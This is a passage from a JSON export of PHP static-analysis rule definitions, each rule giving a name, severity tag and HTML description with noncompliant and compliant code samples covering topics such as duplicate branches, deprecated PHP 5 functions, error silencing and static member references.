}\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[{"key":"extends_implements_line","htmlDesc":"Class names, &quot;extends&quot; and &quot;implements&quot; keywords should be located on the same line","defaultValue":"true","type":"BOOLEAN"},{"key":"no_space_method_name","htmlDesc":"There should not be any space after a method name","defaultValue":"true","type":"BOOLEAN"},{"key":"closure_format","htmlDesc":"Closure declarations should be correctly 
spaced","defaultValue":"true","type":"BOOLEAN"},{"key":"space_comma","htmlDesc":"Commas should be followed by one space and not preceded by any","defaultValue":"true","type":"BOOLEAN"},{"key":"open_curly_brace_classes_functions","htmlDesc":"Open curly braces should be at the beginning of a new line for classes and functions","defaultValue":"true","type":"BOOLEAN"},{"key":"namespace_blank_line","htmlDesc":"&quot;namespace&quot; declarations should be followed by a blank line","defaultValue":"true","type":"BOOLEAN"},{"key":"open_curly_brace_control_structures","htmlDesc":"Open curly braces should be at the end of line for control structures","defaultValue":"true","type":"BOOLEAN"},{"key":"one_space_after","htmlDesc":"There should be exactly one space between closing parenthesis and opening curly braces","defaultValue":"true","type":"BOOLEAN"},{"key":"interfaces_indentation","htmlDesc":"List of implemented interfaces should be correctly indented","defaultValue":"true","type":"BOOLEAN"},{"key":"foreach_space","htmlDesc":"In foreach statement there should be one space before and after &quot;as&quot; keyword and &quot;=&gt;&quot; operator","defaultValue":"true","type":"BOOLEAN"},{"key":"no_space","htmlDesc":"There should not be any space after the opening parenthesis and before the closing parenthesis","defaultValue":"true","type":"BOOLEAN"},{"key":"function_calls_arguments_indentation","htmlDesc":"Arguments in method\/function calls should be correctly indented","defaultValue":"true","type":"BOOLEAN"},{"key":"closing_curly_brace","htmlDesc":"Close curly brace and the next &quot;else&quot;, &quot;catch&quot; and &quot;finally&quot; keywords should be located on the same line","defaultValue":"true","type":"BOOLEAN"},{"key":"function_declaration_arguments_indentation","htmlDesc":"Arguments in method\/function declarations should be correctly indented","defaultValue":"true","type":"BOOLEAN"},{"key":"use_blank_line","htmlDesc":"&quot;use&quot; declarations should be followed 
by a blank line","defaultValue":"true","type":"BOOLEAN"},{"key":"one_space_for","htmlDesc":"There should be one space after each &quot;;&quot; in &quot;for&quot; statement","defaultValue":"true","type":"BOOLEAN"},{"key":"use_after_namespace","htmlDesc":"&quot;use&quot; declarations should be placed after &quot;namespace&quot; declarations","defaultValue":"true","type":"BOOLEAN"},{"key":"one_space_before","htmlDesc":"There should be exactly one space between control structure keyword and opening parenthesis or curly brace","defaultValue":"true","type":"BOOLEAN"}],"type":"CODE_SMELL"},{"key":"php:S1848","repo":"php","name":"Objects should not be created to be dropped immediately without being used","htmlDesc":"<p>There is no good reason to create a new object to not do anything with it. Most of the time, this is due to a missing piece of code and so could\nlead to an unexpected behavior in production.<\/p>\n<p>If it was done on purpose because the constructor has side-effects, then that side-effect code should be moved into a separate, static method and\ncalled directly.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif ($x &lt; 0) {\n  new foo;  \/\/ Noncompliant\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n$var = NULL;\nif ($x &lt; 0) {\n  $var = new foo;\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1862","repo":"php","name":"Related \"if\/else if\" statements and \"cases\" in a \"switch\" should not have the same condition","htmlDesc":"<p>A <code>switch<\/code> and a chain of <code>if<\/code>\/<code>else if<\/code> statements is evaluated from top to bottom. At most, only one branch will\nbe executed: the first one with a condition that evaluates to <code>true<\/code>.<\/p>\n<p>Therefore, duplicating a condition automatically leads to dead code. Usually, this is due to a copy\/paste error. 
At best, it's simply dead code and\nat worst, it's a bug that is likely to induce further bugs as the code is maintained, and obviously it could lead to unexpected behavior.<\/p>\n<p>For a <code>switch<\/code>, if the first case ends with a <code>break<\/code>, the second case will never be executed, rendering it dead code. Worse\nthere is the risk in this situation that future maintenance will be done on the dead case, rather than on the one that's actually used.<\/p>\n<p>On the other hand, if the first case does not end with a <code>break<\/code>, both cases will be executed, but future maintainers may not notice\nthat.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif ($param == 1)\n  openWindow();\nelse if ($param == 2)\n  closeWindow();\nelse if ($param == 1)  \/\/ Noncompliant\n  moveWindowToTheBackground();\n\n\nswitch($i) {\n  case 1:\n    \/\/...\n    break;\n  case 3:\n    \/\/...\n    break;\n  case 1:  \/\/ Noncompliant\n    \/\/...\n    break;\n  default:\n    \/\/ ...\n    break;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif ($param == 1)\n  openWindow();\nelse if ($param == 2)\n  closeWindow();\nelse if ($param == 3)\n  moveWindowToTheBackground();\n\nswitch($i) {\n  case 1:\n    \/\/...\n    break;\n  case 3:\n    \/\/...\n    break;\n  default:\n    \/\/ ...\n    break;\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n  executed <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n<\/ul>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1871","repo":"php","name":"Two branches in the same conditional structure should not have exactly the same implementation","htmlDesc":"<p>Having two <code>cases<\/code> in the same <code>switch<\/code> statement or branches 
in the same <code>if<\/code> structure with the same\nimplementation is at best duplicate code, and at worst a coding error. If the same logic is truly needed for both instances, then in an\n<code>if<\/code> structure they should be combined, or for a <code>switch<\/code>, one should fall through to the other. <\/p>\n<p>Moreover, when the second and third operands of a ternary operator are the same, the operator will always return the same value regardless of the\ncondition. Either the operator itself is pointless, or a mistake was made in coding it.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nswitch ($i) {\n  case 1:\n    doSomething();\n    break;\n  case 2:\n    doSomethingDifferent();\n    break;\n  case 3:  \/\/ Noncompliant; duplicates case 1's implementation\n    doSomething();\n    break;\n  default:\n    doTheRest();\n}\n\nif ($a &gt;= 0 &amp;&amp; $a &lt; 10) {\n  doTheThing();\n}\nelse if ($a &gt;= 10 &amp;&amp; $a &lt; 20) {\n  doTheOtherThing();\n}\nelse if ($a &gt;= 20 &amp;&amp; $a &lt; 50) {\n  doTheThing();  \/\/ Noncompliant; duplicates first condition\n}\nelse {\n  doTheRest();\n}\n\nif ($b == 0) {\n  doOneMoreThing();\n}\nelse {\n  doOneMoreThing(); \/\/ Noncompliant; duplicates then-branch\n}\n\n$b = $a ? 
4 : 4;  \/\/ Noncompliant; both operands are the same, so the result never depends on $a\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nswitch ($i) {\n  case 1:\n  case 3:\n    doSomething();\n    break;\n  case 2:\n    doSomethingDifferent();\n    break;\n  default:\n    doTheRest();\n}\n\nif (($a &gt;= 0 &amp;&amp; $a &lt; 10) || ($a &gt;= 20 &amp;&amp; $a &lt; 50)) {\n  doTheThing();\n}\nelse if ($a &gt;= 10 &amp;&amp; $a &lt; 20) {\n  doTheOtherThing();\n}\nelse {\n  doTheRest();\n}\n\ndoOneMoreThing();\n\n$b = 4;\n<\/pre>\n<p>or <\/p>\n<pre>\nswitch ($i) {\n  case 1:\n    doSomething();\n    break;\n  case 2:\n    doSomethingDifferent();\n    break;\n  case 3:\n    doThirdThing();\n    break;\n  default:\n    doTheRest();\n}\n\nif ($a &gt;= 0 &amp;&amp; $a &lt; 10) {\n  doTheThing();\n}\nelse if ($a &gt;= 10 &amp;&amp; $a &lt; 20) {\n  doTheOtherThing();\n}\nelse if ($a &gt;= 20 &amp;&amp; $a &lt; 50) {\n  doTheThirdThing();\n}\nelse {\n  doTheRest();\n}\n\nif ($b == 0) {\n  doOneMoreThing();\n}\nelse {\n  doTheRest();\n}\n\n$b = $a ? 4 : 8;\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1996","repo":"php","name":"Files should contain only one top-level class or interface each","htmlDesc":"<p>A file that grows too much tends to aggregate too many responsibilities and inevitably becomes harder to understand and therefore to maintain. This\nis doubly true for a file with multiple top-level classes and interfaces. It is strongly advised to divide the file into one top-level class or\ninterface per file.<\/p>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1997","repo":"php","name":"Files should not contain inline HTML","htmlDesc":"<p>Shared coding conventions allow teams to collaborate efficiently. 
To avoid the confusion that can be caused by tangling two coding languages in the\nsame file, inline HTML should be avoided.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n&lt;?php\n$name = \"George\";\n?&gt;\n&lt;p&gt; Hello &lt;?php echo $name ?&gt;!&lt;\/p&gt;\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>File having the extension <code>.phtml<\/code> are ignored by this rule because they are expected to have mixed PHP and HTML.<\/p>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1998","repo":"php","name":"References should not be passed to function calls","htmlDesc":"<p>Passing a reference to a function parameter means that any modifications the method makes to the parameter will be made to the original value as\nwell, since references have the effect of pointing two variables at the same memory space. This feature can be difficult to use correctly,\nparticularly if the callee is not expecting a reference, and the improper use of references in function calls can make code less efficient rather than\nmore efficient. <\/p>\n<p>Further, according to the PHP manual: <\/p>\n<blockquote>\n  As of PHP 5.3.0, you will get a warning saying that \"call-time pass-by-reference\" is deprecated... 
And as of PHP 5.4.0, call-time pass-by-reference\n  was removed, so using it will raise a fatal error.\n<\/blockquote>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nmyfun(&amp;$name);  \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nmyfun($name);\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/374\">MITRE, CWE-374<\/a> - Passing Mutable Objects to an Untrusted Method <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2000","repo":"php","name":"Files should not contain characters before \"<?php\"","htmlDesc":"<p>Any character before <code>&lt;?php<\/code> is sent to the client as output before the script runs, so headers can no longer be set afterwards. This causes \"Cannot modify header information\" errors, and the stray bytes are prepended to every response the file takes part in, which breaks Ajax and JSON responses.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\ntest&lt;?php  \/\/Noncompliant\n\/\/ ...\n<\/pre>\n<p>and<\/p>\n<pre>\n\/\/ Noncompliant; newline before opening tag\n&lt;?php\n\/\/ ...\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n&lt;?php\n\/\/ ...\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S2001","repo":"php","name":"Functions deprecated in PHP 5 should not be used","htmlDesc":"<p>Deprecated language features are those that have been retained temporarily for backward compatibility, but which will eventually be removed from\nthe language. In effect, deprecation announces a grace period to allow the smooth transition from the old features to the new ones. 
In that period, no\nuse of the deprecated features should be added to the code, and all existing uses should be gradually removed.<\/p>\n<p>The following functions were deprecated in PHP 5:<\/p>\n<table>\n  <tbody>\n    <tr>\n      <th>Deprecated<\/th>\n      <th>Use Instead<\/th>\n    <\/tr>\n    <tr>\n      <td><code>call_user_method()<\/code><\/td>\n      <td><code>call_user_func()<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>call_user_method_array()<\/code><\/td>\n      <td><code>call_user_func_array()<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>define_syslog_variables()<\/code><\/td>\n      <td><\/td>\n    <\/tr>\n    <tr>\n      <td><code>dl()<\/code><\/td>\n      <td><\/td>\n    <\/tr>\n    <tr>\n      <td><code>ereg()<\/code><\/td>\n      <td><code>preg_match()<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>ereg_replace()<\/code><\/td>\n      <td><code>preg_replace()<\/code> (note that its 'e' modifier is itself deprecated as of PHP 5.5; use <code>preg_replace_callback()<\/code> for that case)<\/td>\n    <\/tr>\n    <tr>\n      <td><code>eregi()<\/code><\/td>\n      <td><code>preg_match()<\/code> with 'i' modifier<\/td>\n    <\/tr>\n    <tr>\n      <td><code>eregi_replace()<\/code><\/td>\n      <td><code>preg_replace()<\/code> with 'i' modifier<\/td>\n    <\/tr>\n    <tr>\n      <td><code>set_magic_quotes_runtime()<\/code> and its alias, <code>magic_quotes_runtime()<\/code><\/td>\n      <td><\/td>\n    <\/tr>\n    <tr>\n      <td><code>session_register()<\/code><\/td>\n      <td><code>$_SESSION<\/code> superglobal<\/td>\n    <\/tr>\n    <tr>\n      <td><code>session_unregister()<\/code><\/td>\n      <td><code>$_SESSION<\/code> superglobal<\/td>\n    <\/tr>\n    <tr>\n      <td><code>session_is_registered()<\/code><\/td>\n      <td><code>$_SESSION<\/code> superglobal<\/td>\n    <\/tr>\n    <tr>\n      <td><code>set_socket_blocking()<\/code><\/td>\n      <td><code>stream_set_blocking()<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>split()<\/code><\/td>\n      <td><code>preg_split()<\/code><\/td>\n    
<\/tr>\n    <tr>\n      <td><code>spliti()<\/code><\/td>\n      <td><code>preg_split()<\/code> with 'i' modifier<\/td>\n    <\/tr>\n    <tr>\n      <td><code>sql_regcase()<\/code><\/td>\n      <td><\/td>\n    <\/tr>\n    <tr>\n      <td><code>mysql_db_query()<\/code><\/td>\n      <td><code>mysql_select_db()<\/code> and <code>mysql_query()<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>mysql_escape_string()<\/code><\/td>\n      <td><code>mysql_real_escape_string()<\/code> (note that the whole <code>mysql_*<\/code> extension was removed in PHP 7; prefer prepared statements via PDO or mysqli over escaping)<\/td>\n    <\/tr>\n    <tr>\n      <td>Passing locale category names as strings<\/td>\n      <td>Use the LC_* family of constants<\/td>\n    <\/tr>\n  <\/tbody>\n<\/table>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2002","repo":"php","name":"Errors should not be silenced","htmlDesc":"<p>Just as pain is your body's way of telling you something is wrong, errors are PHP's way of telling you there's something you need to fix. Neither\npain nor PHP errors should be ignored.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n@doSomethingDangerous($password);  \/\/ Noncompliant; '@' silences errors from function call\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\ndoSomethingDangerous($password);\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S2003","repo":"php","name":"\"require_once\" and \"include_once\" should be used instead of \"require\" and \"include\"","htmlDesc":"<p>At root, <code>require<\/code>, <code>require_once<\/code>, <code>include<\/code>, and <code>include_once<\/code> all perform the same task of\nincluding one file in another. 
However, the way they perform that task differs, and they should not be used interchangeably.<\/p>\n<p><code>require<\/code> includes a file but generates a fatal error if an error occurs in the process.<\/p>\n<p><code>include<\/code> also includes a file, but generates only a warning if an error occurs.<\/p>\n<p>Predictably, the difference between <code>require<\/code> and <code>require_once<\/code> is the same as the difference between <code>include<\/code>\nand <code>include_once<\/code> - the \"_once\" versions ensure that the specified file is only included once. <\/p>\n<p>Because including the same file multiple times could have unpredictable results, the \"once\" versions are preferred.<\/p>\n<p>Because <code>include_once<\/code> generates only warnings, it should be used only when the file is being included conditionally, i.e. when all\npossible error conditions have been checked beforehand.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\ninclude 'code.php';  \/\/Noncompliant; not a \"_once\" usage and not conditional\ninclude $user.'_history.php'; \/\/ Noncompliant\nrequire 'more_code.php';  \/\/ Noncompliant; not a \"_once\" usage\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nrequire_once 'code.php';\nif (is_member($user)) {\n  include_once $user.'_history.php';\n}\nrequire_once 'more_code.php';\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S2004","repo":"php","name":"Functions should not be nested too deeply","htmlDesc":"<p>Nesting functions can quickly turn your code into \"spaghetti code\". 
Such code is hard to read, refactor and therefore to maintain.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default threshold of 3:<\/p>\n<pre>\nfunction f () {\n  function f_inner () {\n    function f_inner_inner() {\n      function f_inner_inner_inner() { \/\/ Noncompliant\n      }\n    }\n  }\n}\n<\/pre>","status":"READY","tags":["rank4"],"langName":"PHP","params":[{"key":"max","defaultValue":"3","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S2005","repo":"php","name":"String literals should not be concatenated","htmlDesc":"<p>There is no reason to concatenate literal strings. Doing so is an exercise in reducing code readability. Instead, the strings should be\ncombined.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$msg = \"Hello \" . \"${name}\" . \"!\";  \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n$msg = \"Hello ${name}!\";\n<\/pre>","status":"READY","tags":["rank4"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2007","repo":"php","name":"Functions and variables should not be defined outside of classes","htmlDesc":"<p>Defining and using global variables and global functions, when the convention dictates OOP can be confusing and difficult to use properly for\nmultiple reasons:<\/p>\n<ul>\n  <li> You run the risk of name clashes. <\/li>\n  <li> Global functions must be stateless, or they can cause difficult-to-track bugs. <\/li>\n  <li> Global variables can be updated from anywhere and may no longer hold the value you expect. <\/li>\n  <li> It is difficult to properly test classes that use global functions. <\/li>\n<\/ul>\n<p>Instead of being declared globally, such variables and functions should be moved into a class, potentially marked <code>static<\/code>, so they can\nbe used without a class instance. 
<\/p>\n<p>This rule checks that only object-oriented programming is used and that no functions or procedures are declared outside of a class.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n&lt;?php\n\n$name = \"Bob\"; \/\/ Noncompliant\n\nfunction doSomething($arg) {   \/\/ Noncompliant\n  \/\/...\n}\n\nclass MyClass {\n    \/\/...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n&lt;?php\nclass MyClass {\n\n  public static $name = \"Bob\"; \/\/ Compliant\n\n  public static function doSomething($arg) {              \/\/ Compliant\n    \/\/...\n  }\n  \/\/...\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2010","repo":"php","name":"\"&&\" and \"||\" should be used","htmlDesc":"<p>PHP has two sets of logical operators: <code>&amp;&amp;<\/code> \/ <code>||<\/code>, and <code>and<\/code> \/ <code>or<\/code>. The difference between\nthe sets is precedence. Because <code>and<\/code> \/ <code>or<\/code> have a lower precedence than almost any other operator, using them instead of\n<code>&amp;&amp;<\/code> \/ <code>||<\/code> may not have the result you expect.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$have_time = true;\n$have_money = false;\n$take_vacation = $have_time and $have_money;  \/\/ Noncompliant. $take_vacation == true.\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n$have_time = true;\n$have_money = false;\n$take_vacation = $have_time &amp;&amp; $have_money;  \/\/ $take_vacation == false.\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S2011","repo":"php","name":"\"global\" should not be used","htmlDesc":"<p>Global variables are a useful construct, but they should not be abused. Functions can access the global scope either through the\n<code>global<\/code> keyword or though the <code>$GLOBALS<\/code> array, but these practices considerably reduce the function's readability and\nreusability. 
Instead, the global variable should be passed as a parameter to the function.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$myGlobalVariable;\n\nfunction foo()\n{\n  global $myGlobalVariable; \/\/ Noncompliant\n  $GLOBALS['myGlobalVariable']; \/\/ Noncompliant\n  \/\/ ...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction foo($myStateVariable)\n{\n  \/\/ ...\n}\n<\/pre>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2014","repo":"php","name":"\"$this\" should not be used in a static context","htmlDesc":"<p><code>$this<\/code> refers to the current class instance. But static methods can be accessed without instantiating the class, and <code>$this<\/code>\nis not available to them. Using <code>$this<\/code> in a static context will result in a fatal error at runtime.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass Clazz {\n  $name=NULL;  \/\/ instance variable\n\n  public static function foo(){\n    if ($this-&gt;name != NULL) {\n      \/\/ ...\n    }\n  }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass Clazz {\n  $name=NULL;  \/\/ instance variable\n\n  public static function foo($nameParam){\n    if ($nameParam != NULL) {\n      \/\/ ...\n    }\n  }\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S2036","repo":"php","name":"Files that define symbols should not cause side-effects","htmlDesc":"<p>Files that define symbols such as classes and variables may be included into many files. Simply performing that inclusion should have no effect on\nthose files other than declaring new symbols. For instance, a file containing a class definition should not also contain side-effects such as\n<code>print<\/code> statements that will be evaluated automatically on inclusion. Logic should be segregated into symbol-only files and\nside-effect-only files. 
The type of operation which is not allowed in a symbol-definition file includes but is not limited to: <\/p>\n<ul>\n  <li> generating output <\/li>\n  <li> modifying <code>ini<\/code> settings <\/li>\n  <li> emitting errors or exceptions <\/li>\n  <li> modifying global or static variables <\/li>\n  <li> reading\/writing files <\/li>\n<\/ul>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n&lt;?php\n\nprint \"Include worked!\";\n\nclass foo {\n  \/\/ ...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n&lt;?php\n\nclass foo {\n\n  public function log() {\n    print \"Include worked!\";\n  }\n\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"http:\/\/www.php-fig.org\/psr\/psr-1\/\">PHP-FIG Basic Coding Standard PSR1<\/a>, 2.3 - Side Effects <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S2037","repo":"php","name":"Static members should be referenced with \"static::\"","htmlDesc":"<p>References in a class to static class members (fields or methods) can be made using either <code>self::$var<\/code> or <code>static::$var<\/code>\n(introduced in 5.3). The difference between the two is one of scope. Confusingly, in subclasses, the use of <code>self::<\/code> references the\noriginal definition of the member, i.e. the superclass version, rather than any override at the subclass level. 
<code>static::<\/code>, on the other\nhand, references the class that was called at runtime.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n&lt;?php\n\nclass Toy {\n\n    public static function status() {\n        self::getStatus();  \/\/ Noncompliant; will always print \"Sticks are fun!\" even when called from a subclass which overrides this method;\n    }\n\n    protected static function getStatus() {\n        echo \"Sticks are fun!\";\n    }\n}\n\nclass Ball extends Toy {\n\n    protected static function getStatus() {  \/\/ Doesn't actually get called\n        echo \"Balls are fun!\";\n    }\n}\n\n$myBall = new Ball();\n$myBall::status();  \/\/ Prints \"Sticks are fun!\"\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n&lt;?php\n\nclass Toy {\n\n    public static function status() {\n        static::getStatus();  \/\/ Compliant\n    }\n\n    protected static function getStatus() {\n        echo \"Sticks are fun!\";\n    }\n}\n\nclass Ball extends Toy {\n\n    protected static function getStatus() {\n        echo \"Balls are fun!\";\n    }\n}\n\n$myBall = new Ball();\n$myBall::status();  \/\/ Prints \"Balls are fun!\"\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>No issue is raised when <code>self<\/code> is used on a constant field, a private field or a private method.<\/p>\n<pre>\nclass A\n{\n    private static $somevar = \"hello\";\n    const CONSTANT = 42;\n\n    private static function foo()\n    {\n        $var = self::$somevar . self::CONSTANT;  \/\/ Should be OK\n        self::foo();                               \/\/ Should be OK\n    }\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S2038","repo":"php","name":"Colors should be defined in upper case","htmlDesc":"<p>Shared coding conventions allow teams to collaborate effectively. 
Writing colors in upper case makes them stand out at such, thereby making the\ncode easier to read.<\/p>\n<p>This rule checks that hexadecimal color definitions are written in upper case.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$white = '#ffffff';  \/\/ Noncompliant\n$dkgray = '#006400';\n$aqua = '#00ffff';  \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n$white = '#FFFFFF';  \/\/ Compliant\n$dkgray = '#006400';\n$aqua = '#00FFFF';  \/\/ Compliant\n<\/pre>","status":"READY","tags":["rank4"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2041","repo":"php","name":"Parentheses should not be used for calls to \"echo\"","htmlDesc":"<p><code>echo<\/code> can be called with or without parentheses, but it is best practice to leave parentheses off the call because using parentheses\nwith multiple arguments will result in a parse error.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\necho(\"Hello\");  \/\/ Noncompliant, but it works\necho(\"Hello\", \"World\"); \/\/ Noncompliant. Parse error\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\necho \"Hello\";\necho \"Hello\",\"World!\";\n<\/pre>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2043","repo":"php","name":"Superglobals should not be accessed directly","htmlDesc":"<p>Superglobal variables are predefined variables available in all scopes throughout a script. However, accessing them directly is considered bad\npractice. 
Instead, they should be accessed through an object or framework that handles sanitation and validation.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$name = $_POST['name'];\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n$name = $this-&gt;params()-&gt;fromPost('name');\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2044","repo":"php","name":"\"php_sapi_name()\" should not be used","htmlDesc":"<p>Both <code>php_sapi_name()<\/code> and the <code>PHP_SAPI<\/code> constant give the same value. But calling the method is less efficient that simply\nreferencing the constant. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (php_sapi_name() == 'test') { ... }\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (PHP_SAPI == 'test') { ... }\n<\/pre>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S2046","repo":"php","name":"Perl-style comments should not be used","htmlDesc":"<p>Shared coding conventions allow teams to collaborate effectively. This rule flags all Perl-style comments.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$myvar; # Noncompliant; this comment should have started with \"\/\/\"\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n$myvar; \/\/ Compliant; this comment started with \"\/\/\"\n<\/pre>","status":"READY","tags":["rank4"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2047","repo":"php","name":"The names of methods with boolean return values should start with \"is\" or \"has\"","htmlDesc":"<p>Well-named functions can allow the users of your code to understand at a glance what to expect from the function - even before reading the\ndocumentation. 
Toward that end, methods returning a boolean property should have names that start with \"is\" or \"has\" rather than with \"get\".<\/p>\n<p>Note that this rule will only apply to functions that are documented to return a boolean.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n\/**\n * @return boolean\n *\/\npublic function getFoo() \/\/ Noncompliant\n{\n  return foo;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n\/**\n * @return boolean\n *\/\npublic function isFoo()\n{\n  return true;\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2050","repo":"php","name":"Alias functions should not be used","htmlDesc":"<p>Certain functions exist in PHP only as aliases of other functions. These aliases have been made available for backward compatibility, but should\nreally be removed from code. <\/p>\n<p>This rule looks for uses of the following aliases:<\/p>\n<table>\n  <tbody>\n    <tr>\n      <th>Alias<\/th>\n      <th>Replacement<\/th>\n    <\/tr>\n    <tr>\n      <td><code>chop<\/code><\/td>\n      <td><code>rtrim<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>close<\/code><\/td>\n      <td><code>closedir<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>doubleval<\/code><\/td>\n      <td><code>floatval<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>fputs<\/code><\/td>\n      <td><code>fwrite<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>ini_alter<\/code><\/td>\n      <td><code>ini_set<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>is_double<\/code><\/td>\n      <td><code>is_float<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>is_integer<\/code><\/td>\n      <td><code>is_int<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>is_long<\/code><\/td>\n      <td><code>is_int<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>is_real<\/code><\/td>\n      <td><code>is_float<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>is_writeable<\/code><\/td>\n      
